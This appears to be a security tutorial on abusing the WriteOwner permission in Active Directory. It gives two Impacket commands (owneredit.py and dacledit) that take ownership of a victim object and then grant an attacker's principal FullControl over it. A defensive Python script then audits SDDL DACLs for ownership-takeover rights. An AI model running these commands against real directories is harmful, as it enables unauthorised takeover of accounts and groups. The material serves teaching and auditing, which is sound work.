Exploitation of Discretionary Access Control Lists (DACLs) using the WriteOwner permission in Active Directory environments. The WriteOwner permission can be abused by an attacker to change the object's owner to an attacker-controlled principal and take over the object: the owner of an AD object can always modify its DACL, so ownership is effectively full control.

To change the ownership of the object, you may use Impacket's owneredit.py script:

```
owneredit.py -action write -owner 'owned_principal' -target 'victim' 'DOMAIN'/'USER':'PASSWORD' -dc-ip IP.OF.DOMAIN.CONTROLLER
```

Now that we own the object, we can grant our principal Full Control over the user or group with Impacket's dacledit.py (packaged as impacket-dacledit on some distributions):

```
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'owned_principal' -target 'victim' 'DOMAIN'/'USER':'PASSWORD' -dc-ip IP.OF.DOMAIN.CONTROLLER
```
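The defensive counterpart of the two commands above is knowing, before an attacker does, which principals already hold WriteOwner on a sensitive object. The following audit script is an added example, not part of the original text and not Impacket code: it parses an object's DACL in SDDL form (as returned by `(Get-Acl "AD:\<DN>").Sddl`, or by decoding the `nTSecurityDescriptor` attribute with a tool of your choice) and reports every non-privileged trustee that can take ownership, either directly (WriteOwner), via GenericAll (which contains it), or via WriteDacl (the holder can rewrite the DACL and grant itself WriteOwner). The SDDL string, the SIDs and the trustee allow-list are constructed sample values; in practice you would extend the allow-list with your own domain's privileged SIDs, because a full SID such as `S-1-5-21-...-512` is not recognised as the `DA` alias.

```python
"""Audit an Active Directory object's DACL (SDDL form) for ownership-takeover rights.

Added example: not from the original page and not Impacket code. Assumes the DACL
is available as an SDDL string. All SIDs and ACEs below are constructed samples.
"""
import re

# Access-mask bits relevant to ownership takeover (WinNT.h / [MS-DTYP] 2.4.3).
WRITE_DAC = 0x00040000    # can rewrite the DACL, so can grant itself WriteOwner
WRITE_OWNER = 0x00080000  # the right this page describes
GENERIC_ALL = 0x10000000  # full control; maps to every specific right, including WriteOwner
TAKEOVER_MASK = WRITE_DAC | WRITE_OWNER | GENERIC_ALL

# SDDL two-letter right codes -> access-mask bits (generic, standard and DS-specific rights).
SDDL_RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "RP": 0x00000010, "WP": 0x00000020, "CC": 0x00000001, "DC": 0x00000002,
    "LC": 0x00000004, "SW": 0x00000008, "LO": 0x00000080, "DT": 0x00000040,
    "CR": 0x00000100,
}

# SDDL well-known SID aliases that are expected to hold these rights (extend with
# the full SIDs of your own privileged groups; constructed allow-list).
PRIVILEGED_TRUSTEES = {"DA", "EA", "SY", "BA", "CO"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(field):
    """Turn the SDDL rights field into an integer access mask.
    The field is either a hex number ("0x80000") or a run of two-letter codes."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        code = field[i:i + 2]
        if code not in SDDL_RIGHTS:
            raise ValueError("unknown SDDL right %r" % code)
        mask |= SDDL_RIGHTS[code]
    return mask


def parse_dacl(sddl):
    """Return the DACL ACEs of an SDDL string as a list of dicts (empty if no DACL)."""
    # The DACL segment is "D:" + optional flags (P, AR, AI) + one or more "(ace)" strings.
    m = re.search(r"D:((?:P|AR|AI)*)((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(2)):
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError("malformed ACE %r" % body)
        ace_type, flags, rights, obj_guid, inh_guid, trustee = fields[:6]
        aces.append({
            "type": ace_type,                 # A / OA = allow, D / OD = deny
            "mask": parse_rights(rights),
            "object_guid": obj_guid,
            "inherited": "ID" in flags,       # ID flag: ACE came from a parent OU/container
            "trustee": trustee,
        })
    return aces


def rights_names(mask):
    """Human-readable names for the takeover bits set in mask."""
    names = []
    if mask & GENERIC_ALL:
        names.append("GenericAll")
    if mask & WRITE_OWNER:
        names.append("WriteOwner")
    if mask & WRITE_DAC:
        names.append("WriteDacl")
    return names


def takeover_findings(sddl, privileged=PRIVILEGED_TRUSTEES):
    """List non-privileged trustees whose allow ACEs grant ownership-takeover rights.
    Explicit deny ACEs for the same trustee are subtracted; denies that reach a
    principal through group membership are NOT resolved here (no token available)."""
    aces = parse_dacl(sddl)
    denied = {}
    for a in aces:
        if a["type"] in ("D", "OD"):
            denied[a["trustee"]] = denied.get(a["trustee"], 0) | a["mask"]
    findings = []
    for a in aces:
        if a["type"] not in ("A", "OA") or a["trustee"] in privileged:
            continue
        effective = a["mask"] & TAKEOVER_MASK & ~denied.get(a["trustee"], 0)
        if effective:
            findings.append({"trustee": a["trustee"],
                             "rights": rights_names(effective),
                             "inherited": a["inherited"]})
    return findings


# Constructed sample DACL for a hypothetical user object.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"                             # Domain Admins: expected
    "(A;;GA;;;SY)"                                                     # SYSTEM: expected
    "(A;;RPLCLORC;;;AU)"                                               # read-only: harmless
    "(A;;WO;;;S-1-5-21-1004336348-1177238915-682003330-1105)"          # explicit WriteOwner
    "(A;CIID;WDWO;;;S-1-5-21-1004336348-1177238915-682003330-1120)"    # inherited from the OU
    "(A;;WO;;;S-1-5-21-1004336348-1177238915-682003330-1130)"          # cancelled by the deny below
    "(D;;WO;;;S-1-5-21-1004336348-1177238915-682003330-1130)"
)

if __name__ == "__main__":
    for f in takeover_findings(SAMPLE_SDDL):
        origin = "inherited" if f["inherited"] else "explicit"
        print("%s %s (%s)" % (f["trustee"], "+".join(f["rights"]), origin))
```

Inherited findings deserve the first look: a WriteOwner ACE inherited from an OU affects every object beneath it, so one delegation mistake exposes many accounts. Once the finding is remediated, the same parser can be re-run over the fresh SDDL to confirm the ACE is gone.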